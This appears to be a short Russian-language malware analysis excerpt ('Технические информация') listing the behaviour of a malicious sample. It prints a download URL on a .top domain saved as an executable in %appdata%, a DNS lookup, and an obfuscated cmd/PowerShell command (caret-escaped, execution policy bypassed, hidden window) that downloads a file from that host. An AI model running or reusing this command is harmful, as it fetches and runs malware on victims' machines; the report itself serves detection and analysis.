Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWE^rSh^ELl.e^Xe ^-E^x^EC^ut^IONP^O^L^ICy^ ^b^yPASS -^n^OP^ROfILE -W^IN^do^wSty^le hidd^eN (New^-^o^bjEC^T ^SYSt^E^m.^NET.^WEBC^lI^enT^).^DowN^LoA^D^fil^e^(^'http://zuss...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /C "poWE^rSh^ELl.e^Xe ^-E^x^EC^ut^IONP^O^L^ICy^ ^b^yPASS -^n^OP^ROfILE -W^IN^do^wSty^le hidd^eN (New^-^o^bjEC^T ^SYSt^E^m.^NET.^WEBC^lI^enT^).^DowN^LoA^D^fil^e^(^'http://zuss...' (со скрытым окном)